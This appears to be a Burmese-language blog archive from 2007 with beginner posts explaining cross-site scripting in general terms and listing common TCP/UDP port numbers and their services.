အစရွိတဲ့ ေဖာ္ျပခ်က္မ်ိဳးေတြ တစ္ခုျပီးတစ္ခု ျမင္ရမွာျဖစ္ပါတယ္ ...

တကယ္လို႕ ဒုကၡေပးမယ့္ အရာေတြ ကိုယ့္ကြန္ပ်ဳတာထဲက အခ်က္အလက္ေတြ ႏိႈက္ထုတ္ ခိုးယူေတာ႕မယ့္ အရာေတြပါလာျပီဆိုရင္လည္း အလုပ္စေနျပီ ျဖစ္ပါတယ္ ….
ကိုယ့္ဘက္က ေတာင္းဆိုလိုက္ျပီဆိုကတဲက Server မွာ ဘယ္ေနရာကေတာင္းဆိုေနတာလဲ၊ ဘာေဆာ့ဖ္၀ဲ သံုးထားလဲ အစရွိတဲ့ ကၽြန္ေတာ္တို႕ရဲ႕ အခ်က္အလက္တစ္ခ်ဳိ႕ ပါသြားျပီျဖစ္ပါတယ္

ဒီအေၾကာင္းအရာေလးနဲ႕ ဆင္တူျဖစ္ရပ္ေလးကို Symantec ကေနအခုလို ဗီဒီယိုေလးနဲ႕ ရွင္းျပထားတာ ရွိပါတယ္။ ေလ့လာၾကည့္ၾကပါ ခင္ဗ်ာ ….



ဆက္လက္ေဖာ္ျပပါမည္ ....

Jun 24, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting


ဒီရက္ပိုင္းေတြမွာ ကၽြန္ေတာ္ XSS သို႕မဟုတ္ Cross-Site Scripting ဆိုတာေလးကို
ေလ႕လာေနမိပါတယ္။ အေတာ္ေလး စိတ္၀င္စားစရာေကာင္းတဲ့
အေၾကာင္းအရာ တစ္ခုလည္းျဖစ္ပါတယ္။
ဒါဟာ -

  • ကြန္ပ်ဳတာသံုးေနတဲ့ သူေတြရဲ႕ မသိနားမလည္မႈ၊ ဗဟုသုတ နည္းပါးမႈေတြကို
  • အခြင့္အေရးတစ္ခုလို အသံုးခ်တတ္တဲ့ ေကာက္က်စ္ စဥ္းလဲတဲ့ Web User ေတြက
  • တျခားေသာ မသိနားမလည္သူေတြၾကည့္ရႈမည့္ Web စာမ်က္ႏွာမ်ား အတြင္းမွာ
  • သူ႕တို႕အတြက္ အလုပ္လုပ္ေပးမယ့္ သေကၤတ Code ေတြကို တိတ္တဆိတ္ထည့္သြင္းေပး လိုက္ႏိုင္တဲ့ Web Application ေတြမွာ ေတြ႕ရတတ္တဲ့
  • ကြန္ပ်ုဳတာေတြရဲ႕ လံုျခံဳေရးနဲ႕ သက္ဆိုင္တဲ ့နည္းပညာတစ္ခု ျဖစ္ပါတယ္။
အဲဒီ သေကၤတေတြထဲကအခ်ဳိ႕ကို ဥပမာအေနနဲ႕ ေဖာ္ျပရရင္ -
  • HTML သေကၤတေတြနဲ႕
  • Client-side script ေတြ ပါ၀င္ပါတယ္ ။
Client-side script ဆိုတာကေတာ႕ -
  • web page ေတြကို ၾကည့္ရႈမယ့္ user ေတြရဲ႕ အင္တာနက္ၾကည့္ေဆာ႕ဖ္၀ဲ - Browser ေပၚမွာ အလုပ္လုပ္ေအာင္ ဖန္တီးေရးသားထားေသာ၊
  • user ေတြရဲ႕ ေဆာင္ရြက္ခ်က္ေတြ၊ ေနရာေဒသေတြ၊ ပတ္၀န္းက်င္အေျခအေနေတြ အေပၚမူတည္ျပီး web page ထဲက အေၾကာင္းအရာမ်ားကို အလိုက္သင့္ ေျပာင္းလဲ ေနေအာင္ ဖန္တီးေရးသားထားေသာ
  • အင္တာနက္ စာမ်က္ႏွာမ်ားအတြင္းက ကြန္ပ်ဳတာ ပရိုဂရမ္ အတန္းအစား တစ္ခုျဖစ္ပါတယ္ ...
  • အမ်ားအားျဖင့္ HTML, Java Script (client-side Java Script), Images, ActiveX, Java ဘာသာစကားမ်ဳိးေတြ နဲ႕ အျခားေသာ အင္တာနက္နည္းပညာေတြကိုု သံုးျပီး ေရးေလ့ရွိၾကပါတယ္ ...
ဒီလိုတိုက္ခိုက္မႈေတြမွာ ဘာေတြပါ၀င္လဲဆိုေတာ႕ -
  • Phishing - လုိ႕ေခၚတဲ့ user name ေတြ , password ေတြနဲ႕ credit card ဆိုင္ရာ အေသးစိတ္အခ်က္အလက္မ်ား စတဲ့ အေရးၾကီးတဲ့ အခ်က္အလက္ေတြကို တိတ္တဆိတ္ ႏိႈက္ထုတ္ယူေဆာင္ျခင္း
  • Browser exploit - လို႕ေခၚတဲ့ အင္တာနက္ၾကည့္ Browser ရဲ႕ ေဆာ႕ဖ္၀ဲ ဆိုင္ရာ အားနည္းခ်က္တစ္ခုခုကို အသံုးခ်ျပီး - Browser ေဆာ႕ဖ္၀ဲကို ရပ္တန္႕ပစ္လိုက္ျခင္း၊ user ကြန္ပ်ဳတာထဲက ဖိုင္ေတြကို ဖတ္ရႈ ေရးသားျခင္း၊ ဗိုင္းရပ္စ္မ်ားထည့္သြင္းျခင္း နဲ႕ ေထာက္လွမ္းေရးေဆာ႕ဖ္၀ဲ ( spyware ) မ်ား ထည့္သြင္းလိုက္ျခင္း
အစရွိတဲ့ အရာေတြပါ၀င္ပါတယ္ ...

ဆက္လက္ေဖာ္ျပပါမည္ ....

May 28, 2007

Computer မ်ားရဲ႕ဂယ္ေပါက္မ်ား(၁)


ဒီေန႕ေတာ႕ port နံပါတ္ ၀ ကေန ၈၀ အထိ အေၾကာင္းကို ေဖာ္ျပသြားမွာပါ..
ဒီ port ေတြကို Common ports ေတြလို႕လဲ ေခၚပါေသးတယ္။ အေသးစိတ္ကိုေတာ႕ ေအာက္မွာျမင္ရမွာပါ...

Port

Description

status

0/TCP,UDP

Reserved; do not use (but is a permissible source port value if the sending process does not expect messages in response)

Official

1/TCP,UDP

TCPMUX (TCP port service multiplexer)

Official

5/TCP,UDP

RJE (Remote Job Entry)

Official

7/TCP,UDP

ECHO protocol

Official

9/TCP,UDP

DISCARD protocol

Official

11/TCP,UDP

SYSTAT protocol


13/TCP,UDP

DAYTIME protocol

Official

17/TCP,UDP

QOTD (Quote of the Day) protocol

Official

18/TCP,UDP

Message Send Protocol

Official

19/TCP,UDP

CHARGEN (Character Generator) protocol

Official

20/TCP

FTP - data port

Official

21/TCP

FTP - control (command) port

Official

22/TCP,UDP

SSH (Secure Shell) - used for secure logins, file transfers (scp, sftp) and port forwarding

Official

23/TCP,UDP

Telnet protocol - unencrypted text communications

Official

25/TCP,UDP

SMTP - used for e-mail routing between mailservers E-mails

Official

26/TCP,UDP

RSFTP - A simple FTP-like protocol

Unofficial

35/TCP,UDP

QMS Magicolor 2 printer

Unofficial

37/TCP,UDP

TIME protocol

Official

38/TCP,UDP

Route Access Protocol

Official

39/TCP,UDP

Resource Location Protocol

Official

41/TCP,UDP

Graphics

Official

42/TCP,UDP

Host Name Server

Official

43/TCP

WHOIS protocol

Official

49/TCP,UDP

TACACS Login Host protocol

Official

53/TCP,UDP

DNS (Domain Name System)

Official

57/TCP

MTP, Mail Transfer Protocol


67/UDP

BOOTP (BootStrap Protocol) server; also used by DHCP (Dynamic Host Configuration Protocol)

Official

68/UDP

BOOTP client; also used by DHCP

Official

69/UDP

TFTP (Trivial File Transfer Protocol)

Official

70/TCP

Gopher protocol

Official

79/TCP

Finger protocol

Official

80/TCP

HTTP (HyperText Transfer Protocol) - used for transferring web pages

Official

May 27, 2007

Computer မ်ားရဲ႕ဂယ္ေပါက္မ်ား


ကၽြန္ေတာ္တို႕Computer ေတြမွာ ကၽြန္ေတာ္တို႕မသိေသးတဲ့ ဂယ္ေပါက္ေတြအမ်ားၾကီးရွိေနပါတယ္.. အဲဒီေနရာေတြကေန အေကာင္ေတြ (Virus, Trojan & Worm) ေတြ ၀င္၀င္ကိုက္တာေပါ့ ခင္ဗ်ာ...
အဲဒီဟာေလး ေတြကို Port ေတြလို႕ ေခၚပါတယ္...

  • အပိုင္း ၃ ပိုင္းခဲြထားပါတယ္
  • Well known ports, Register ports, Dynamic or Private ports တို႕ျဖစ္
  • Well known = port 0 to 1023
  • Registered = port 1024 to 49151
  • Dynamic and/or Private = ports 49152 to 65535
Well Known Port Numbers
Well knowns port မ်ားမွာ IANA ( Internet Assign Numbers Authority ) ကသတ္မွတ္ေပးထားေသာ port မ်ားျဖစ္သည္။ OS တြင္အသံုးျပဳမည့္ Program မ်ား၊ user မ်ား အသံုးျပဳမည့္ Program မ်ားတြင္ အမ်ားဆံုး အသံုးျပဳသည္။

TCP ( Transmission Control Protocol ) တြင္သံုးထားေသာ ports မ်ားမွာ အခ်ိန္ၾကာျမင့္စြာ ဆက္သြယ္ ေဆာင္ရြက္ရသည့္ အလုပ္မ်ားအတြက္ ျဖစ္သည္။
အတိအက် မသိႏိုင္ေသာ ေခၚဆိုဆက္သြယ္မႈမ်ားအတြက္ အလုပ္လုပ္ေပးႏိုင္ရန္ Service contact port တစ္ခုကို သတ္မွတ္ေပးရသည္။ Contact port ကိုပင္ Well Known Port မ်ားဟု ေခၚၾကသည္။
ေအာက္ပါစာရင္းတြင္ Server မွ၎၏ contact port မ်ားအျဖစ္ လုပ္ငန္းေဆာင္ရြက္ရာတြင္ အသံုးျပဳေသာport မ်ားကို ေတြ႕ရမည္-

အလုပ္မ်ားတိုးခ်ဲ႕ေဆာင္ရြက္ႏိုင္ရန္အတြက္ TCP port မ်ားကို UDP တြင္လည္းအတူတူပင္သံုးသည္
IANA မွ စီမံသတ္မွတ္ေပးထားေသာ Assign ports မ်ားမွာ 0 မွ 1023 အထိျဖစ္သည္ -